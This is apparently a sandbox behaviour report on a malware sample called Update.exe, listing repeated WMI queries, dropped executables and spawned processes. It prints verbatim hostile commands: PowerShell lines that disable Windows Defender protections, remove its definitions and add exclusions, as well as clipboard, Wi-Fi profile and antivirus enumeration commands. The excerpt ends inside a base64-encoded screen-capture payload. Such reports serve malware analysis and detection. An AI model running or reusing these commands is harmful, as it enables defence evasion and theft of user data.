                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Update.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: Update.exe, 00000001.00000003.1919694007.000002D8F6659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: Update.exeReversingLabs: Detection: 50%
                    Source: Update.exeString found in binary or memory: id-cmc-addExtensions
                    Source: Update.exeString found in binary or memory: set-addPolicy
                    Source: Update.exeString found in binary or memory: can't send non-None value to a just-started generator
                    Source: Update.exeString found in binary or memory: --help
                    Source: Update.exeString found in binary or memory: --help
                    Source: C:\Users\user\Desktop\Update.exeFile read: C:\Users\user\Desktop\Update.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Update.exe "C:\Users\user\Desktop\Update.exe"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Users\user\Desktop\Update.exe "C:\Users\user\Desktop\Update.exe"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Local\Temp\Build.exe "C:\Users\user\AppData\Local\Temp\Build.exe"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe "C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0